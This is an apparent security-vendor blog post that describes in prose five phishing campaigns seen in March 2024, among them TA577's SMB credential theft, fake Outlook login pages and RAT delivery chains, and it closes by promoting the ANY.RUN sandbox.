Top 5 Evolving Phishing Campaigns In March 2024

In March 2024, there can be found a range of phishing attacks. It is all because of the criminals’ mindset to use new tactics and approaches to attack innocent victims.

Phishing attacks are increasing day by day. So, it requires you to be familiar with the current threat landscape better. For this, you have to explore the five most prominent campaigns that we have outlined for you in this blog post.

Let’s explore this blog and draw your attention to the complete details of these attacks.

1. Attempt Employing Smbserver To Access Victims' Login Information

The month began with an assault. It was carried out by the notorious TA577 threat actor. The effort targeted victims' credentials. Later on, it started with an illicit email in English or German with the subject line "I sent a material to your side last day; did you receive it?" The email included a ZIP package. This package consists of a malicious HTML file. From then, the attack unfolded as follows:

  • The victim accessed the HTML page, which was created on a 450-byte template.
  • The page routed the user to a file on a third-party server. It was using an impacket-smbserver and the SMB protocol.
  • The attackers obtained the victim's IP address, NTLM challenge data, username, and computer name.

2. Attack Using Fraudulent MS Outlook Login Pages

 

Another phishing attempt was launched in early March. It included a Telegram bot and phishing websites. These websites are hosted on Cloudflare Workers. The goal was to steal user login passwords. For this, the attackers automatically replicate the appearance and feel of their businesses' MS Outlook login pages.

These pages included numerous elements:

  • Base64 encoded background graphics and design components were obtained straight from Microsoft.
  • Common JavaScript frameworks such as popper.js, jQuery, and Bootstrap provide a familiar user experience.
  • The victim's corporate logo was retrieved via the Clearbit Logo service.

The attackers sent the victim's login details to a Telegram bot. The user was then taken to the official Microsoft Outlook page.

3. Attack Targeting Latin Americans 

In March, one of the geo-specific efforts targeted victims in the LATAM area. In a single situation, the attackers pretended to be Colombian official organizations in their spam emails. The emails were backed up by PDFs. These emails accused the receivers of traffic offenses or other legal troubles. The attack progressed as follows:

  • The user saw a PDF and downloaded a copy.
  • The archive included a VBS script.
  • When executed, the script invoked a PowerShell script.
  • This PowerShell script retrieved the final payload from a reputable storage service.

The most recent payload was one of numerous remote access trojans (RATs), including AsyncRAT, NjRAT, and Remcos. 

4. Attack Leveraging AWS to Release STRRAT

This phishing effort used legal services like AWS and Github. These services help store payloads and rely once again on social engineering. Victims got emails encouraging them to confirm payment details by clicking a button. Its results are the following:

  • Victims clicked the button and received a malicious JAR file masquerading as a payment invoice.
  • After starting, the file used a PowerShell instruction to execute two other JAR files.
  • The last stage involves VCU RAMS or STRRAT malware being downloaded from Github or AWs and compromising the victim's PC

5. Attack combining TikTok and Google AMP

The most recent phishing attempt on this list made use of many genuine services. At the same time, these tricks were used to trick consumers into entering their passwords. It employed a chain of redirection. Later on, it began with TikTok and ended with Cloudflare.

Here's a thorough account of the attack:

  • A TikTok link with a Google AMP external URL within the URI "&target=" field causes a redirect.
  • Google AMP then masked a secret address. It results in a URL Shortener Service. To mask the redirection target, the final domain address included Unicode characters.
  • The URL shortening service routed the victim's browser to Cloudflare, which hosts the phishing website.

The page included a form with many encrypted code pieces. They were gradually decoded and combined during browser rendering. It also prevented right-click interactions. As a result,  it made element examination difficult. After submitting the form, the attackers received the victim's stolen data via an HTTP POST request.

Analyzation Of Phishing Campaigns in ANY.RUN

ANY.RUN is a cloud-based sandbox. It is for doing sophisticated malware and phishing analysis. The service offers a completely interactive virtual environment. The best part is that under such circumstances you may investigate and engage with the danger and the system.

For example, in the case of phishing, it can assist you in completing tasks that require human involvement to grasp the full chain of attacks. The Sandbox also enables you to quickly monitor harmful networks. Additionally, it is helpful for registry activities, tracing and inspecting processes, extracting indications of compromise, and obtaining threat reports.

Did you find this guide interesting? Join our TTB Community on LinkedIn for more exclusive blogs & the latest updates.